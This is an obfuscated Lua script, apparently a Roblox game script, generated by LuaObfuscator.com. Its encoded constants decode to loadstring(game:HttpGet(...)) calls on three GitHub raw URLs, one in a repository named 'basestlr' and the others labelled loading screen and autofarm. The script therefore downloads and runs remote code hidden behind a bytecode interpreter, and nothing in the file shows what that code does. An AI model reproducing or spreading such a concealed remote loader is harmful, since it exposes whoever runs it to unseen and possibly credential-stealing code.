--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v82,v19);v19=nil;v93=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-1)))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-1)) + 1)) ;return v83-(v83%(2 -1)) ;else local v84=0;local v85;while true do if (v84==(619 -(555 + 64))) then v85=(933 -(857 + 74))^(v32-(569 -(367 + (1078 -(282 + 595))))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=1637 -(1523 + (496 -382)) ;local v35;while true do if (v34==(0 + (117 -(32 + 85)))) then v35=v1(v16,v18,v18);v18=v18 + (1 -(0 + 0)) ;v34=1066 -(68 + 997) ;end if (v34==(1271 -(226 + 1044))) then return v35;end end end local function v22() local v36=(350 -(87 + 263)) + 0 ;local v37;local v38;while true do if ((181 -(67 + 113))==v36) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;v36=1 -0 ;end end end local function v23() local v39=(0 -0) + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * (12338840 + 4438376)) + (v42 * (260471 -194935)) + (v41 * (1208 -(802 + 150))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (5 -2) );v18=v18 + 2 + 1 + 1 ;v39=998 -(915 + 82) ;end end end local function v24() local v44=v23();local v45=v23();local v46=1 -0 ;local v47=(v20(v45,1188 -(340 + 729 + 118) ,45 -25 ) * ((3 -1)^(27 + 5))) + v44 ;local v48=v20(v45,21,6 + 25 );local v49=((v20(v45,56 -(796 -(201 + 571)) )==1) and  -(1 + 0)) or 1 ;if (v48==(791 -(368 + 423))) then if (v47==((1138 -(116 + 1022)) -0)) then return v49 * (18 -(10 + 8)) ;else v48=3 -2 ;v46=442 -(416 + 26) ;end elseif (v48==(6535 -4488)) then return ((v47==0) and (v49 * (((4 -3) + 0)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1461 -(145 + 293)) ) * (v46 + (v47/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end local function v25(v50) local v51;if  not v50 then local v86=0 + 0 ;while true do if (v86==(0 -0)) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1 + (0 -0)) );v18=v18 + v50 ;local v52={};for v66=3 -2 , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~=0) then else local v89=(function() return 867 -(550 + 317) ;end)();local v90=(function() return;end)();while true do if (v89==(0 -0)) then v90=(function() return 0 -0 ;end)();while true do if (v90~=(5 -3)) then else v53=(function() return  #"~";end)();break;end if (v90==0) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 286 -(134 + 151) ;end)();end if ((1666 -(970 + 695))==v90) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 1992 -(582 + 1408) ;end)();end end break;end end end if (v53==(6 -4)) then for v95= #"[",v23() do local v96=(function() return 0 -0 ;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do if ((0 -0)==v96) then local v107=(function() return 1824 -(1195 + 629) ;end)();local v108=(function() return;end)();while true do if (v107~=(0 -0)) then else v108=(function() return 241 -(187 + 54) ;end)();while true do if (v108==0) then v97=(function() return 780 -(162 + 618) ;end)();v98=(function() return nil;end)();v108=(function() return 1 + 0 ;end)();end if (v108==(1 + 0)) then v96=(function() return 1 -0 ;end)();break;end end break;end end end if ((1 -0)==v96) then while true do if (v97==0) then v98=(function() return v21();end)();if (v20(v98, #",", #"[")==0) then local v115=(function() return 0;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115~=0) then else v116=(function() return v20(v98,1 + 1 , #"19(");end)();v117=(function() return v20(v98, #"?id=",6);end)();v115=(function() return 1637 -(1373 + 263) ;end)();end if (v115~=3) then else if (v20(v117, #"gha", #"xxx")== #"|") then v118[ #"?id="]=(function() return v59[v118[ #"asd1"]];end)();end v54[v95]=(function() return v118;end)();break;end if (v115==(1002 -(451 + 549))) then if (v20(v117, #"/", #"}")~= #",") then else v118[1 + 1 ]=(function() return v59[v118[2 -0 ]];end)();end if (v20(v117,2,2)== #"!") then v118[ #"-19"]=(function() return v59[v118[ #"-19"]];end)();end v115=(function() return 3;end)();end if (1~=v115) then else local v156=(function() return 0 -0 ;end)();while true do if (1~=v156) then else v115=(function() return 2;end)();break;end if (v156~=(1384 -(746 + 638))) then else local v169=(function() return 0;end)();while true do if (v169==(1 + 0)) then v156=(function() return 1 -0 ;end)();break;end if (v169==(341 -(218 + 123))) then v118=(function() return {v22(),v22(),nil,nil};end)();if (v116==0) then local v171=(function() return 1581 -(1535 + 46) ;end)();while true do if (v171~=(0 + 0)) then else v118[ #"19("]=(function() return v22();end)();v118[ #"0313"]=(function() return v22();end)();break;end end elseif (v116== #",") then v118[ #"xnx"]=(function() return v23();end)();elseif (v116==(1 + 1)) then v118[ #"19("]=(function() return v23() -((562 -(306 + 254))^16) ;end)();elseif (v116== #"19(") then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176~=0) then else v177=(function() return 0;end)();while true do if (v177==(0 -0)) then v118[ #"xxx"]=(function() return v23() -((1469 -(899 + 568))^(11 + 5)) ;end)();v118[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v169=(function() return 2 -1 ;end)();end end end end end end end break;end end break;end end end for v99= #"|",v23() do v55[v99-#"]" ]=(function() return v28();end)();end return v57;end if (v53== #"<") then local v91=(function() return 603 -(268 + 335) ;end)();local v92=(function() return;end)();while true do if (v91==(290 -(60 + 230))) then v92=(function() return 572 -(426 + 146) ;end)();while true do if (v92~=1) then else for v110= #" ",v58 do local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==(0 + 0)) then v112=(function() return 0;end)();v113=(function() return nil;end)();v111=(function() return 1;end)();end if (v111==1) then v114=(function() return nil;end)();while true do if (v112~=(1456 -(282 + 1174))) then else local v157=(function() return 811 -(569 + 242) ;end)();local v158=(function() return;end)();while true do if (v157==(0 -0)) then v158=(function() return 0;end)();while true do if (v158~=(1 + 0)) then else v112=(function() return 1025 -(706 + 318) ;end)();break;end if (v158==(1251 -(721 + 530))) then local v170=(function() return 0;end)();while true do if (v170==0) then v113=(function() return v21();end)();v114=(function() return nil;end)();v170=(function() return 1272 -(945 + 326) ;end)();end if (v170==(2 -1)) then v158=(function() return 1 + 0 ;end)();break;end end end end break;end end end if (v112~=(701 -(271 + 429))) then else if (v113== #"]") then v114=(function() return v21()~=0 ;end)();elseif (v113==(2 + 0)) then v114=(function() return v24();end)();elseif (v113== #"-19") then v114=(function() return v25();end)();end v59[v110]=(function() return v114;end)();break;end end break;end end end v57[ #"nil"]=(function() return v21();end)();v92=(function() return 1502 -(1408 + 92) ;end)();end if (v92==2) then v53=(function() return 1088 -(461 + 625) ;end)();break;end if (v92==0) then v58=(function() return v23();end)();v59=(function() return {};end)();v92=(function() return 1289 -(993 + 295) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1173 -(418 + (1609 -(564 + 292))) ];local v65=v60[4 -1 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1 + 0 ;local v73= -(1 + (0 -0));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v87=0 + 0 + 0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + (530 -((882 -(41 + 435)) + (1124 -(938 + 63)))) ];else v78[v87]=v75[v87 + (1770 -(1749 + 20)) ];end end local v79=(v76-v70) + 1 + 0 + 0 ;local v80;local v81;while true do local v88=0;while true do if (v88==(2 -1)) then if (v81<=(1329 -(1249 + 73))) then if ((v81<=(2 + 1)) or (1871<636)) then if ((v81<=(1146 -(466 + 679))) or (4061<2572)) then if (v81>(0 -0)) then v78[v80[979 -((1678 -(936 + 189)) + 424) ]]=v80[5 -2 ];else do return;end end elseif (v81>((2 + 3) -3)) then v78[v80[1615 -(1565 + 48) ]]=v62[v80[3]];else v78[v80[1902 -(106 + 1109 + 685) ]]();end elseif ((1881>=1293) and (v81<=(2 + 3))) then if (v81==(2 + 2)) then local v123=0 + 0 ;local v124;while true do if (v123==(0 -0)) then v124=v80[5 -3 ];v78[v124]=v78[v124](v13(v78,v124 + (115 -(4 + 110)) ,v73));break;end end else local v125=v80[586 -(57 + 527) ];local v126,v127=v71(v78[v125](v13(v78,v125 + (1428 -(41 + 1386)) ,v80[(1244 -(782 + 356)) -(17 + (353 -(176 + 91))) ])));v73=(v127 + v125) -(1 + 0) ;local v128=753 -(239 + 514) ;for v151=v125,v73 do local v152=0 -0 ;while true do if (v152==(1329 -(797 + 532))) then v128=v128 + (2 -1) ;v78[v151]=v126[v128];break;end end end end elseif (v81>((13 -8) + 1)) then local v129=v80[1 + 1 ];local v130=v78[v80[(248 -79) -(122 + 44) ]];v78[v129 + (1 -0) ]=v130;v78[v129]=v130[v80[1206 -(373 + 829) ]];else v78[v80[6 -(1096 -(975 + 117)) ]]=v62[v80[3 + 0 ]];end elseif ((2357==2357) and (v81<=(7 + 4))) then if ((123==123) and (v81<=(2 + 7))) then if (v81>(16 -8)) then local v136=v80[67 -(30 + 35) ];local v137=v78[v80[3 + 0 ]];v78[v136 + (1258 -((2918 -(157 + 1718)) + 214)) ]=v137;v78[v136]=v137[v80[15 -11 ]];else v78[v80[1214 -(323 + 889) ]]={};end elseif ((v81==(26 -16)) or (1056>=3392)) then v78[v80[582 -(361 + 178 + 41) ]]={};else v78[v80[322 -(53 + 267) ]]=v80[1 + 2 ];end elseif (v81<=(11 + 2)) then if (v81==(6 + 6)) then local v145=v80[415 -(15 + 398) ];v78[v145]=v78[v145](v13(v78,v145 + (983 -(18 + 964)) ,v73));else do return;end end elseif (v81>(52 -38)) then v78[v80[5 -(10 -7) ]]();else local v147=v80[2 + 0 ];local v148,v149=v71(v78[v147](v13(v78,v147 + 1 + 0 ,v80[2 + (3 -2) ])));v73=(v149 + v147) -(851 -(20 + 830)) ;local v150=0 + 0 ;for v153=v147,v73 do local v154=(1144 -(697 + 321)) -((315 -199) + 10) ;while true do if (v154==(0 + (0 -0))) then v150=v150 + ((1703 -964) -(542 + 196)) ;v78[v153]=v148[v150];break;end end end end v72=v72 + (1 -0) ;break;end if (v88==(0 + 0)) then v80=v68[v72];v81=v80[1 -0 ];v88=1 + 0 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403523Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6A6F686E736372697074322F6261736573746C722F726566732F68656164732F6D61696E2F6D652Q736167652E74787403583Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6A6F686E736372697074322F626173656C6F6164696E672F726566732F68656164732F6D61696E2F6C6F6164696E677363722Q656E3103513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6A6F686E736372697074322F626173657363726970742F726566732F68656164732F6D61696E2F6175746F6661726D00174Q000A7Q001203000100013Q001203000200023Q002007000200020003001201000400044Q000E000200044Q000400013Q00022Q0002000100010001001203000100013Q001203000200023Q002007000200020003001201000400054Q000E000200044Q000400013Q00022Q0002000100010001001203000100013Q001203000200023Q002007000200020003001201000400064Q000E000200044Q000400013Q00022Q00020001000100016Q00017Q00",v9(),...);